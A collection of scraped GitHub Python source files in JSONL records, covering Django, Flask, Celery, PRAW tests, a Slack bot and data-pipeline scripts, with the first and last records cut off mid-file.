**kwargs):\n context = super().get_context_data( **kwargs)\n \n \n context['is_not_premium'] = not self.request.user.groups.filter(name = 'premium').exists()\n context['is_not_authors'] = not self.request.user.groups.filter(name = 'authors').exists()\n \n\n #список текущих подписок юзера\n sub = Category.objects.order_by('name').filter(subscribers=self.request.user)\n context['sub'] = sub\n #список категорий без подписки \n context['sub_not'] = Category.objects.order_by('name').exclude(subscribers=self.request.user) \n return context\n \n\n\n \n \n \n \n \n\n\n# Добавляем функциональное представление в группу премиум\n@login_required # декоратор проверки аунтентификации группа премиум\ndef upgrade_me(request):\n user = request.user\n premium_group = Group.objects.get(name='premium')\n if not request.user.groups.filter(name='premium').exists():\n premium_group.user_set.add(user)\n else:\n premium_group.user_set.remove(user) \n return redirect('protect:personal')\n\n\n@login_required # группа авторы и с включением в модель Авторы\ndef upauthors(request):\n user = request.user\n authors_group = Group.objects.get(name='authors')\n if not request.user.groups.filter(name='authors').exists():\n \n authors_group.user_set.add(user)\n Author.objects.create(authorUser=user)\n else:\n authors_group.user_set.remove(user)\n Author.objects.get(authorUser=user).delete()\n \n return redirect('protect:personal')\n\n","repo_name":"VetN/moduleD2_homework","sub_path":"NewsPaper/protect/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4907263367","text":"# Importing section\nimport json\n\nimport requests\nimport argparse\nimport logging\n\nfrom classes.pm_sidechain_interface import PMSidechainInterface\n\n# Main\nif __name__ == \"__main__\":\n arg_parser = argparse.ArgumentParser()\n arg_parser.add_argument('-c', help='config file')\n arg_parser.add_argument('-l', help='log file')\n\n args = arg_parser.parse_args()\n cfg = json.loads(open(args.c).read())\n\n # Get configuration about connections to InfluxDB and remote service related to data retrieving\n tmp_config = json.loads(open(cfg['connectionsFile']).read())\n cfg.update(tmp_config)\n\n # set logging object\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n if not args.l:\n log_file = None\n else:\n log_file = args.l\n\n logger = logging.getLogger()\n logging.basicConfig(format='%(asctime)-15s::%(threadName)s::%(levelname)s::%(funcName)s::%(message)s',\n level=logging.INFO, filename=log_file)\n\n url_prefix = cfg['sidechainRestApi']\n headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}\n\n logger.info('Starting program')\n\n # Calculate the values\n cmd_request = '%s/energyPrices' % url_prefix\n\n logger.info('Request: %s' % cmd_request)\n r = requests.get(cmd_request)\n data = json.loads(r.text)\n logger.info('Response: %s' % data)\n\n logger.info('Ending program')\n","repo_name":"supsi-dacd-isaac/parity-sidechain-interface","sub_path":"scripts/pm/energy_price_calculator.py","file_name":"energy_price_calculator.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19286604612","text":"import requests\n\nfrom celery import Celery\nfrom celery import shared_task\nfrom django.conf import settings\nfrom datetime import datetime, timedelta\nfrom pytz import timezone, utc\nfrom random import randint\n\nfrom accounts.models import User\nfrom .models import CurrentDate, Game, Player, Line, Pick, Subline\nfrom sendgrid.helpers.mail import Mail\nfrom sendgrid import SendGridAPIClient\nfrom django.utils import dateformat\n\napp = Celery()\n\n# Every half hour, pull up all games that are happening now.\n# For each game, for each attached line, make every attached\n# subline invisible.\n@shared_task\ndef remove_lines_when_game_starts():\n # Add current PST time to the system date\n cd = CurrentDate.objects.first().date\n date = datetime.now(tz=utc)\n time = date.astimezone(timezone(\"US/Pacific\")).time()\n dt = datetime.combine(cd, time)\n\n # For debugging\n # dt = dt.replace(hour=19, minute=0)\n\n for game in Game.objects.all():\n # Check m/d/y & h:m\n if (\n game.pst_gametime.date() == dt.date()\n and game.pst_gametime.hour == dt.hour\n and game.pst_gametime.minute == dt.minute\n ):\n for line in game.line_set.all():\n line.subline_set.all().update(visible=False)\n\n\n# Every midnight PST, set balance of free to play users to $100\n@shared_task\ndef top_off_free_to_play_user_balances():\n User.objects.filter(free_to_play=True).update(wallet_balance=100)\n\n\n# every hour, get the players' scores and save them.\n# TODO - just run once\n@shared_task\ndef update_player_scores():\n headers = {\"Ocp-Apim-Subscription-Key\": f\"{settings.FANTASY_DATA_API_KEY}\"}\n cd = CurrentDate.objects.first()\n formatted_date = cd.date.strftime(\"%Y-%m-%d\")\n\n r = requests.get(\n f\"https://fly.sportsdata.io/api/nba/fantasy/json/PlayerGameStatsByDate/{formatted_date}\",\n headers=headers,\n )\n data = r.json()\n\n todays_games = []\n for game in Game.objects.all():\n if game.pst_gametime.date() == cd.date:\n todays_games.append(game)\n\n # Find player in our system. Find game they played in today.\n # Find all lines connected to that. Update each subline's actual pts\n for record in data:\n try:\n player = Player.objects.get(name=record[\"Name\"])\n\n todays_game = None\n for game in todays_games:\n if player.team == game.home_team or player.team == game.away_team:\n todays_game = game\n break\n\n if not todays_game:\n raise Exception()\n\n lines = Line.objects.filter(player=player, game=game)\n for line in lines:\n if line.category.category == \"Points\":\n line.actual_value = record[\"Points\"]\n line.save()\n elif line.category.category == \"Rebounds\":\n line.actual_value = record[\"Rebounds\"]\n line.save()\n elif line.category.category == \"Assists\":\n line.actual_value = record[\"Assists\"]\n line.save()\n elif line.category.category == \"Fantasy Points\":\n line.actual_value = record[\"FantasyPoints\"]\n line.save()\n\n except Exception as e:\n print(e)\n print(\"Error with updating player score OR player didn't play today\")\n\n\n# This runs at noon PST everyday\n# For yesterday, find all slips created and send emails.\n# In each email, send outcome of the slip and if new lines exist for today, a preview of those\n@shared_task\ndef send_slip_emails():\n today = datetime.now().date()\n yesterday = today - timedelta(days=1)\n\n # Find all the games for yesterday. Find all the lines that roll up those\n # games. Find all the slips attached to those lines.\n games = Game.objects.filter(datetime__date=yesterday)\n yesterdays_picks = Pick.objects.filter(\n subline__line__game__datetime__date=yesterday\n )\n\n yesterdays_slips = []\n for pick in yesterdays_picks:\n if pick.slip not in yesterdays_slips:\n yesterdays_slips.append(pick.slip)\n\n users_with_slips_yesterday = {}\n for slip in yesterdays_slips:\n if slip.owner.id not in users_with_slips_yesterday:\n users_with_slips_yesterday[slip.owner.id] = []\n users_with_slips_yesterday[slip.owner.id].append(slip)\n\n # Find all the sub lines for today\n today_sublines = Subline.objects.filter(\n line__game__datetime__date=today, visible=True\n )\n\n today_lines = []\n if today_sublines.count():\n first_subline = today_sublines[randint(0, today_sublines.count() - 1)]\n second_subline = today_sublines[randint(0, today_sublines.count() - 1)]\n third_subline = today_sublines[randint(0, today_sublines.count() - 1)]\n\n today_lines = [\n {\n \"src\": first_subline.line.player.headshot_url,\n \"name\": str(first_subline.line.player),\n \"game\": str(first_subline.line.game),\n \"projection\": f\"{str(round(first_subline.projected_value, 1))} {first_subline.line.category.category}\",\n },\n {\n \"src\": second_subline.line.player.headshot_url,\n \"name\": str(second_subline.line.player),\n \"game\": str(second_subline.line.game),\n \"projection\": f\"{str(round(second_subline.projected_value, 1))} {second_subline.line.category.category}\",\n },\n {\n \"src\": third_subline.line.player.headshot_url,\n \"name\": str(third_subline.line.player),\n \"game\": str(third_subline.line.game),\n \"projection\": f\"{str(round(third_subline.projected_value, 1))} {third_subline.line.category.category}\",\n },\n ]\n\n for user_id in users_with_slips_yesterday:\n u = User.objects.get(id=user_id)\n\n slips = users_with_slips_yesterday[user_id]\n slips_sg = []\n\n for slip in slips:\n slips_sg.append(\n {\n \"numPicks\": slip.pick_set.count(),\n \"payoutAmount\": f\"${slip.payout_amount}\",\n \"outcome\": \"Won\" if slip.won else \"Lost\",\n }\n )\n\n message = Mail(\n from_email=\"support@underlinesports.com\",\n to_emails=\"arithmetic@gmail.com\" if settings.DEBUG else slip.owner.email,\n )\n\n ftp = \" Free to Play \" if u.free_to_play else \" \"\n yesterday_str = dateformat.format(yesterday, \"F jS\")\n today_str = dateformat.format(today, \"F jS\")\n subject = f\"Underline{ftp}Results for {yesterday_str}\"\n body = f\"Hey {u.first_name} - here are your{ftp}results for {yesterday_str}.\"\n\n # pass custom values for our HTML placeholders\n payload = {\n \"subject\": subject,\n \"body\": body,\n \"todayDate\": today_str,\n \"slips\": slips_sg,\n \"todayLines\": today_lines,\n }\n\n message.dynamic_template_data = payload\n message.template_id = \"d-83f3ae1c712a4e45af4744e2818489a8\"\n\n sg = SendGridAPIClient(settings.SENDGRID_API_KEY)\n if not settings.DEBUG:\n response = sg.send(message)\n code, body, headers = (\n response.status_code,\n response.body,\n response.headers,\n )\n","repo_name":"dopeboy/underline","sub_path":"server/core/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":7432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33893355724","text":"import time\nimport dateutil.parser\nimport pandas as pd\n\nearthquake = {\n\t'rms': '1.85',\n\t'updated': '2014-06-11T05:22:21.596Z',\n\t'type': 'earthquake',\n\t'magType': 'mwp',\n\t'longitude': '-136.6561',\n\t'gap': '48',\n\t'depth': '10',\n\t'dmin': '0.811',\n\t'mag': '5.7',\n\t'time': '2014-06-04T11:58:58.200Z',\n\t'latitude': '59.0001',\n\t'place': '73km WSW of Haines, Alaska',\n\t'net': 'us',\n\t'nst': '',\n\t'id': 'usc000rauc'}\n\n\ndef eq_to_sentence(quake):\n\tprint(\"A\", \\\n\t\tdepth_to_words(quake['depth']), \\\n\t\tmag_to_words(quake['mag']), \\\n\t\t\"earthquake was reported\", \\\n\t\tday_in_words(quake['time']), \\\n\t\t\"on\", \\\n\t\tdate_in_words(quake['time']), \\\n\t\t\"in the\", \\\n\t\ttime_in_words(quake['time']), \\\n\t\tearthquake['place'] \\\n\t\t+ \".\")\n\ndef ex_to_sentence(explosion):\n\tprint(\"There was also a magnitude\", explosion['mag'], explosion['type'], \"on\", date_in_words(explosion['time']), explosion['place'] + \".\")\n\n\ndef depth_to_words(depth):\n\tif int(depth) > 300:\n\t\treturn \"deep\"\n\tif int(depth) > 70:\n\t\treturn \"intermediate\"\n\tif int(depth) < 70:\n\t\treturn \"shallow\"\n\telse:\n\t\treturn \" \"\n\ndef mag_to_words(mag):\n\tif float(mag) > 8 :\n\t\treturn \"ground breaking strong\"\n\telif float(mag) > 7:\n\t\treturn \"great\"\n\telif float(mag) > 6: \n\t\treturn \"strong\"\n\telif float(mag) > 5:\n\t\treturn \"moderate\"\n\telif float(mag) > 4: \n\t\treturn \"light\"\n\telse:\n\t\treturn \"minor\"\n\ndef day_in_words(timestring): \n\tyourdate = dateutil.parser.parse(timestring)\n\treturn yourdate.strftime(\"%A\")\n\ndef date_in_words(timestring):\n\tyourdate = dateutil.parser.parse(timestring)\n\treturn yourdate.strftime(\"%B %d\")\n\ndef time_in_words(datestring):\n\tyourdate = dateutil.parser.parse(datestring)\n\tweekday = yourdate.strftime(\"%A\")\n\ttime = yourdate.strftime(\"%H:%M\")\n\tif time < '06:00' :\n\t\treturn \"night\"\n\tif time < '12:00': \n\t\treturn \"morning\"\n\tif time < '18:00':\n\t\treturn \"afternoon\"\n\tif time < '24:00': \n\t\treturn \"evening\" \n\telse: \n\t\treturn \"invalid time\"\n\n\nearthquakes_df = pd.read_csv(\"http://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/1.0_month.csv\")\nearthquakes = earthquakes_df.to_dict('records')\n\nfor earthquake in earthquakes: \n\tif earthquake['type'] != 'earthquake':\n\t\tex_to_sentence(earthquake)\n\tif earthquake['mag'] > 4:\n\t\teq_to_sentence(earthquake)\n","repo_name":"thisss/lede12-homework","sub_path":"foundations/09/homework_9.py","file_name":"homework_9.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70358150889","text":"\"\"\"Test praw.reddit.\"\"\"\nfrom base64 import urlsafe_b64encode\n\nimport pytest\nfrom prawcore.exceptions import BadRequest\n\nfrom praw.exceptions import RedditAPIException\nfrom praw.models import LiveThread\nfrom praw.models.reddit.base import RedditBase\nfrom praw.models.reddit.submission import Submission\nfrom praw.models.reddit.subreddit import Subreddit\n\nfrom . import IntegrationTest\n\n\ndef comment_ids():\n with open(\"tests/integration/files/comment_ids.txt\") as fp:\n return fp.read()[:8000]\n\n\ndef junk_data():\n with open(\"tests/integration/files/too_large.jpg\", \"rb\") as fp:\n return urlsafe_b64encode(fp.read()).decode()\n\n\nclass TestDomainListing(IntegrationTest):\n def test_controversial(self, reddit):\n submissions = list(reddit.domain(\"youtube.com\").controversial())\n assert len(submissions) == 100\n\n def test_hot(self, reddit):\n submissions = list(reddit.domain(\"youtube.com\").hot())\n assert len(submissions) == 100\n\n def test_new(self, reddit):\n submissions = list(reddit.domain(\"youtube.com\").new())\n assert len(submissions) == 100\n\n def test_random_rising(self, reddit):\n submissions = list(reddit.domain(\"youtube.com\").random_rising())\n assert len(submissions) == 100\n\n def test_rising(self, reddit):\n list(reddit.domain(\"youtube.com\").rising())\n\n def test_top(self, reddit):\n submissions = list(reddit.domain(\"youtube.com\").top())\n assert len(submissions) == 100\n\n\nclass TestReddit(IntegrationTest):\n @pytest.mark.add_placeholder(comment_ids=comment_ids())\n def test_bad_request_without_json_text_html_response(self, reddit):\n with pytest.raises(RedditAPIException) as excinfo:\n reddit.request(\n method=\"GET\",\n path=f\"/api/morechildren?link_id=t3_n7r3uz&children={comment_ids()}\",\n )\n assert (\n str(excinfo.value)\n == \"

400 Bad request

\\nYour browser sent an invalid \"\n \"request.\\n\\n\"\n )\n\n @pytest.mark.add_placeholder(content=junk_data())\n def test_bad_request_without_json_text_plain_response(self, reddit):\n with pytest.raises(RedditAPIException) as excinfo:\n reddit.request(\n method=\"GET\",\n path=f\"/api/morechildren?link_id=t3_n7r3uz&children={junk_data()}\",\n )\n assert str(excinfo.value) == \"Bad Request\"\n\n def test_bare_badrequest(self, reddit):\n data = {\n \"sr\": \"AskReddit\",\n \"field\": \"link\",\n \"kind\": \"link\",\n \"title\": \"l\",\n \"text\": \"lol\",\n \"show_error_list\": True,\n }\n reddit.read_only = False\n with pytest.raises(BadRequest):\n reddit.post(\"/api/validate_submission_field\", data=data)\n\n def test_info(self, reddit):\n bases = [\"t1_d7ltv\", \"t3_5dec\", \"t5_2qk\"]\n items = []\n for i in range(100):\n for base in bases:\n items.append(f\"{base}{i:02d}\")\n\n item_generator = reddit.info(fullnames=items)\n results = list(item_generator)\n assert len(results) > 100\n for item in results:\n assert isinstance(item, RedditBase)\n\n def test_info_sr_names(self, reddit):\n items = [reddit.subreddit(\"redditdev\"), \"reddit.com\", \"t:1337\", \"nl\"]\n item_generator = reddit.info(subreddits=items)\n results = list(item_generator)\n assert len(results) == 4\n for item in results:\n assert isinstance(item, Subreddit)\n\n def test_info_url(self, reddit):\n results = list(reddit.info(url=\"youtube.com\"))\n assert len(results) > 0\n for item in results:\n assert isinstance(item, Submission)\n\n def test_live_call(self, reddit):\n thread_id = \"ukaeu1ik4sw5\"\n thread = reddit.live(thread_id)\n assert thread.title == \"reddit updates\"\n\n def test_live_create(self, reddit):\n reddit.read_only = False\n live = reddit.live.create(\"PRAW Create Test\")\n assert isinstance(live, LiveThread)\n assert live.title == \"PRAW Create Test\"\n\n def test_live_info(self, reddit):\n ids = \"\"\"\n ta40aifzobnv ta40l9u2ermf ta40ucdiq366 ta416hjgvbhy ta41ln5vsyaz\n ta42cyzy1nze ta42i49806k0 ta436ojd653m ta43945wgmaa ta43znjvza9t\n ta4418kxie3z ta44mk0nllhm ta45j0yvww9t ta4613lzdh8q ta46l8k86jt9\n ta47qua0xu3n ta489fm9515p ta48ml5k1uk9 ta48zy4jzjcb ta49irvwndau\n ta49upckgoyw ta4a02h9ynsb ta4aa4lrgvst ta4alauoi8ws ta4aqyacr70u\n\n ta4ekdk6m5g2 ta4ezvoc49gy ta4f3iv06c1n ta4ffvliq5l7 ta4fib9lx3zx\n ta4gka0ll41h ta4h89f6isfg ta4ht7s8he49 ta4i1eb564ar ta4imxhap4fg\n ta4iu3g9whtk ta4j3o05j0d3 ta4kloqi6csg ta4m6kj44dql ta4mlqtihiil\n ta4ng30l3fz1 ta4nldsjimhu ta4pd78tuk29 ta4prwyy1w9i ta4pvu8y6f8o\n ta4ray2odqub ta4rua4oe6a1 ta4tk9fwjgz1 ta4trgqw6mmx ta4tv3sen7u4\n\n ta4uyh0fnc0a ta4v54gnggcl ta4v5cm004z1 ta4vortaefna ta4wqym9d0v3\n ta4wsuouxjtm ta4x7jr9v0fn ta4yast5e96b ta4z337yzlgu ta4zo9zzo9ui\n ta507u2euo3w ta50exn0mtx1 ta51x2crezff ta52ch48gn6l ta53ijowvc6z\n ta53iy196uod ta541cz1hfb4 ta54n0ncx8pc ta55ytfmre2g ta581bybyjwi\n ta59gcidn2ym ta59mkwnrd43 ta5ar22wzi2w ta5awwo42ibb ta5dhmvylw0l\n\n ta5hipd6wahr ta5itb7clg3s ta5nlm09y8kb ta5nm0f831x1 ta5oavbflorf\n ta5rnv18s85o ta5ru6ysh254 ta5sfz02nc8b ta5syawj086b ta5t41osygln\n ta5uy3ynoo4a ta5w0seb1xfy ta5wddbh0ln0 ta5zmjzuijwo ta617ozbmxhb\n ta64q6pjz2bs ta696fdie4ne ta6bmog7gvoq ta6f9y7sdzru ta6j838d2wjn\n ta6l4q5c17fd ta6ofypk3yp2 ta6sjmjt1aeb ta6sqhgyv41q ta70eezhz50r\n\n ta72azs1l4u9 ta74r3dp2pt5 ta7pfcqdx9cl ta8zxbt2sk6z ta94nde51q4i\n \"\"\".split()\n gen = reddit.live.info(ids)\n threads = list(gen)\n assert len(threads) > 100\n assert all(isinstance(thread, LiveThread) for thread in threads)\n # output may not reflect input order\n thread_ids = [thread.id for thread in threads]\n assert thread_ids != ids\n assert sorted(thread_ids) == ids\n\n def test_live_info__contain_invalid_id(self, reddit):\n ids = [\n \"3rgnbke2rai6hen7ciytwcxadi\",\n \"LiveUpdateEvent_sw7bubeycai6hey4ciytwamw3a\", # invalid\n \"t8jnufucss07\",\n ] # NBA\n gen = reddit.live.info(ids)\n threads = list(gen)\n assert len(threads) == 2\n\n def test_live_now__featured(self, reddit):\n thread = reddit.live.now()\n assert isinstance(thread, LiveThread)\n assert thread.id == \"z2f981agq7ky\"\n\n def test_live_now__no_featured(self, reddit):\n assert reddit.live.now() is None\n\n def test_notes__call__(self, reddit):\n reddit.read_only = False\n notes = list(\n reddit.notes(\n pairs=[\n (reddit.subreddit(\"SubTestBot1\"), \"Watchful1\"),\n (\"SubTestBot1\", reddit.redditor(\"watchful12\")),\n (\"SubTestBot1\", \"spez\"),\n ],\n things=[reddit.submission(\"jlbw48\")],\n )\n )\n assert len(notes) == 4\n assert notes[0].user.name.lower() == \"watchful1\"\n assert notes[1].user.name.lower() == \"watchful12\"\n assert notes[2] is None\n\n def test_notes__things(self, reddit):\n reddit.read_only = False\n thing = reddit.submission(\"tpbemz\")\n notes = list(reddit.notes.things(thing))\n assert len(notes) == 10\n assert notes[0].user == thing.author\n\n def test_random_subreddit(self, reddit):\n names = set()\n for i in range(3):\n names.add(reddit.random_subreddit().display_name)\n assert len(names) == 3\n\n def test_subreddit_with_randnsfw(self, reddit):\n subreddit = reddit.subreddit(\"randnsfw\")\n assert subreddit.display_name != \"randnsfw\"\n assert subreddit.over18\n\n def test_subreddit_with_random(self, reddit):\n assert reddit.subreddit(\"random\").display_name != \"random\"\n\n @pytest.mark.add_placeholder(AVAILABLE_NAME=\"prawtestuserabcd1234\")\n def test_username_available__available(self, reddit):\n assert reddit.username_available(\"prawtestuserabcd1234\")\n\n def test_username_available__unavailable(self, reddit):\n assert not reddit.username_available(\"bboe\")\n\n def test_username_available_exception(self, reddit):\n with pytest.raises(RedditAPIException) as exc:\n reddit.username_available(\"a\")\n assert str(exc.value) == \"BAD_USERNAME: 'invalid user name' on field 'user'\"\n","repo_name":"praw-dev/praw","sub_path":"tests/integration/test_reddit.py","file_name":"test_reddit.py","file_ext":"py","file_size_in_byte":8610,"program_lang":"python","lang":"en","doc_type":"code","stars":3211,"dataset":"github-code","pt":"53"} +{"seq_id":"30167582047","text":"# Object oriented programming\n\n# Breaks programming into objects that interact with each other\n# Objetcs are created from templates known as classes\n# an object is the actual building that we build based on the blueprint\n\n# to Understand how OOP works\n# we can write our own class\n\n# we write class followed by the name of the class\n# syntax\n\n# class name_of_class\n# Example\n# This class can be used to store al the relevant information about a staff in the company\n\nclass staff:\n def __init__(self, p_position, p_name, p_pay):\n self.position = p_position\n self.name = p_name\n self.pay = p_pay\n print(\"Creating Staff object\")\n\n def __str__(self):\n return \"Position = %s, Name = %s, Pay = %d\" %(self.position, self.name, self.pay)\n \n def calculate_pay(self):\n prompt = '\\nEnter number of hours worked for %s: ' %(self.name)\n hours = input(prompt)\n prompt = 'Enter hourly rate for %s: ' %(self.name)\n hourly_rate = input(prompt)\n self.pay = int(hours)*int(hourly_rate)\n return self.pay\n\n# Instantiating an object\n\noffice_staff1 = staff('Basic', 'Yvonne', 0)\n\n# to access the variable name\nprint(office_staff1.name)\n\n# to accesss the variable position\nprint(office_staff1.position)\n\n# to change variable position and print it again\n# change variable position\noffice_staff1.position = 'Manager'\nprint(office_staff1.position)\n\n# to access the variable pay\nprint(office_staff1.pay)\n\n\n# METHODS\n# to use calculatepay() method\noffice_staff1.calculate_pay()\nprint(office_staff1.pay)\n\n\n# to Print a representation of Office_staff1\nprint(office_staff1)\n# you get\n# Position = Manager, Name = Yvonne, Pay = 600","repo_name":"Antoniorios17/python_mini_projects","sub_path":"python_object_oriented_programming/python01_Writing_own_class.py","file_name":"python01_Writing_own_class.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9642048145","text":"from flask import render_template, request\nfrom app import app\nfrom models.event import *\nfrom models.event_list import events\n\n@app.route(\"/events\")\ndef index():\n return render_template(\"index.html\", title=\"home\", events = events)\n\n@app.route(\"/events\", methods = [\"POST\"])\ndef add_event():\n event_title = request.form[\"title\"]\n event_description = request.form[\"description\"] \n event_date = request.form[\"date\"]\n event_location = request.form[\"location\"]\n event_capacity = request.form[\"capacity\"]\n new_event = Event(event_date, event_title, event_capacity, event_location, event_description)\n new_event.add_new_event(events, new_event)\n return render_template(\"index.html\", title=\"home\", events = events)\n\n\n@app.route(\"/events/new\")\ndef new_event():\n return render_template(\"new.html\", title=\"new event\")\n\n\n","repo_name":"br1Pod/wk3_d4_event_lab","sub_path":"controllers/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4893127459","text":"from bot.messages import get_task_actions\nfrom bot.messages.message import Message\n\n\ndef get_task_messages(release_title=None, task=None, task_type=None, all_user_config_meta=None, base_url=None):\n if task[\"status\"] in [\"COMPLETED\", \"SKIPPED\", \"ABORTED\"]:\n actions = []\n attachment_text = \"`{}`\".format(task[\"status\"])\n else:\n actions = get_task_actions(task)\n attachment_text = \"`{}`. Take action!\".format(task[\"status\"])\n if \"owner\" in task:\n attachment_text = \"`{}` {}, take action!\".format(task[\"status\"], task[\"owner\"])\n for config in all_user_config_meta:\n if config[\"username\"] == task[\"owner\"]:\n attachment_text = \"`{}` <@{}>, take action!\".format(task[\"status\"],\n config[\"slack_user_id\"])\n break\n\n if \"description\" in task:\n append_desc = \"\\n*Description*\\n{}\\n\".format(task[\"description\"])\n attachment_text += append_desc\n\n if \"comments\" in task and task[\"comments\"]:\n append_comments = \"\\n*Comments ({})*\\n\".format(len(task[\"comments\"]))\n for comment in task[\"comments\"]:\n append_comments = \"{}*Added by : {}*\\n{}\\n\\n\".format(append_comments,\n comment[\"author\"] if \"author\" in comment else \"\",\n comment[\"text\"])\n attachment_text += append_comments\n\n temp_task_id = task[\"id\"][task[\"id\"].find('Phase'):].replace(\"/\", \"-\")\n temp_release_id = task[\"id\"][:task[\"id\"].find('/Phase')]\\\n .replace(\"Applications/\", \"\")\\\n .replace(\"/\", \"-\")\n url = \"{}?openTaskDetailsModal={}\".format(temp_release_id, temp_task_id)\n release_url = \"{}/#/releases/{}\".format(base_url, temp_release_id)\n\n author = {\n \"author_name\": task_type,\n \"author_icon\": \"https://cdn0.iconfinder.com/data/icons/planing-and-organization/100/12-512.png\"\n }\n footer = {\n \"footer\": \"<{}|{}>\".format(release_url, release_title),\n \"footer_icon\": \"https://cdn2.iconfinder.com/data/icons/scrum-project/100/Release2-512.png\"\n }\n message = Message.get_base_message(author=author, footer=footer)\n message[\"attachments\"][0][\"title\"] = task[\"title\"]\n message[\"attachments\"][0][\"title_link\"] = \"{}/#/releases/{}\".format(base_url, url)\n message[\"attachments\"][0][\"color\"] = Message.get_task_message_color(task[\"status\"])\n message[\"attachments\"][0][\"text\"] = attachment_text\n message[\"attachments\"][0][\"callback_id\"] = \"task-action\"\n message[\"attachments\"][0][\"actions\"] = actions\n return message\n","repo_name":"xebialabs-community/slack-xlrelease-app","sub_path":"bot/messages/task_messages.py","file_name":"task_messages.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23079846196","text":"#coding:utf-8\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nimport pymysql\nimport datetime\nimport traceback\nimport pymongo\n\nfrom city.config import data_config, OpCity_config, base_path, config as temp_config\nfrom call_city_project.step_status import modify_status, getStepStatus\nfrom my_logger import get_logger\nfrom call_city_project.report import make_poi_and_hotel_report, make_image_content_report, get_file\nfrom call_city_project.step_status import modify_status\ntry:\n from call_city_project.city_step_seven import check_POI_data, update_mapinfo, analysis_result, success_report, dumps_sql, send_email_format\nexcept:pass\nfrom city.find_hotel_opi_city import from_ota_get_city\n\nscheduler = BlockingScheduler()\nlogger = get_logger('monitor', base_path)\n\n\ndef update_step_report(csv_path,param,step_front,step_after,step_num):\n conn = pymysql.connect(**OpCity_config)\n cursor = conn.cursor()\n update_sql_front = \"update city_order set report\"+str(step_num)+\"=%s,step\"+str(step_num)+\"=%s where id=%s\"\n update_sql_after = \"update city_order set step\"+str(step_num+1)+\"=%s where id=%s\"\n try:\n cursor.execute(update_sql_front,(csv_path,step_front,param))\n cursor.execute(update_sql_after,(step_after,param))\n conn.commit()\n except Exception as e:\n conn.rollback()\n finally:\n conn.close()\n\ndef from_tag_get_tasks_status(name, flag=False):\n conn = pymysql.connect(**data_config)\n cursor = conn.cursor()\n sql_step_report = \"select * from service_platform_product_mongo_report where tag=%s\"\n sql_step_summary = \"select * from serviceplatform_product_mongo_split_task_summary where task_name=%s\"\n sql = sql_step_report if flag else sql_step_summary\n try:\n cursor.execute(sql, (name,))\n result = cursor.fetchall()\n finally:\n conn.close()\n return result\n\ndef step7_detection(tag):\n try:\n update_mapinfo(tag)\n qyer_report_result, _1, daodao_report_result, _2 = check_POI_data(tag)\n print(qyer_report_result)\n print(daodao_report_result)\n logger.info('[{0}] qyer {1}'.format(tag, qyer_report_result))\n logger.info('[{0}] daodao {1}'.format(tag, daodao_report_result))\n qyer_flag, qyer_report = analysis_result(qyer_report_result, 'qyer')\n daodao_flag, daodao_report = analysis_result(daodao_report_result, 'daodao')\n\n report = success_report(tag)\n check_report = '数据检测结果:\\n' + qyer_report + '\\n' + daodao_report + '\\n\\n' + report\n rsync_paths = []\n if qyer_flag and daodao_flag:\n for source in ['total', 'attr']:\n rsync_path = dumps_sql(tag, source)\n send_email_format(check_report, rsync_path)\n else:\n for source in ['total', 'attr']:\n rsync_paths.append(dumps_sql(tag, source))\n send_email_format(check_report, rsync_paths)\n except Exception as e:\n logger.error('================= ' + tag + ' ================= {}'.format(traceback.format_exc()))\n\n\ndef monitor_task_summary(step):\n stepa = 'step'+step\n logger.info('================= ' + stepa + ' ================= 开始')\n csvpath = ''\n tasks = getStepStatus(stepa)\n for param, values in tasks.items():\n if len(values) == 0: return\n if type(values[0]) is list:\n task_naems = list(zip(*values))[1]\n else:\n task_naems = [values[1]]\n the_progress_of = 0\n for task_name in task_naems:\n logger.info('{}, {}'.format(stepa, task_name))\n tasks_status = from_tag_get_tasks_status(task_name)\n logger.info('{}, {}'.format(stepa, tasks_status))\n line = tasks_status[0]\n t_all, t_done, t_failed = line[3], line[4], line[5]\n if t_all == t_done + t_failed:\n the_progress_of += 1\n\n if the_progress_of==len(task_naems):\n if step=='7':\n tag = task_name.rsplit('_')[-1]\n step7_detection(tag)\n # if not get_file(param, 'poireport.csv'):\n elif step=='8':\n if not make_image_content_report(t_all, t_done, t_failed, param):return\n csvpath = '{}/merge_image_and_content.txt'.format(param)\n if step in ('4', '9'):\n update_step_report(csvpath, param, 4, 0, int(step))\n elif step not in ('6', '7'):\n update_step_report(csvpath, param, 1, 0, int(step))\n modify_status(stepa, param, flag=False)\n logger.info('================= ' + stepa + ' ================= 完成')\n logger.info('================= ' + stepa + ' ================= 1')\n\ndef monitor_report(step):\n stepa = 'step' + step\n logger.info('================= ' + stepa + ' ================= 开始')\n tasks = getStepStatus(stepa)\n for param, values in tasks.items():\n if len(values)==0:continue\n task_names = zip(*values).__next__()\n logger.info('{}, {}'.format(stepa, task_names))\n tag = str(task_names[0].rsplit('_', 1)[-1])\n logger.info('{}, {}'.format(stepa, tag))\n tasks_status = from_tag_get_tasks_status(tag, True)\n finaled_date = max(a[-1] for a in tasks_status)\n all_finaled_data = [a for a in tasks_status if a[-1]==finaled_date]\n logger.info('{}, {}'.format(stepa, tasks_status))\n if len(tasks_status) < len(task_names):\n logger.info('{}, {}'.format(stepa, '任务状态数 小于 任务已发任务数'))\n continue\n status_list_len = 0\n for (_0, source, _2, l_done, l_failed, _5, l_all, d_done, d_failed, d_all, i_done, i_failed, i_all, _13) in 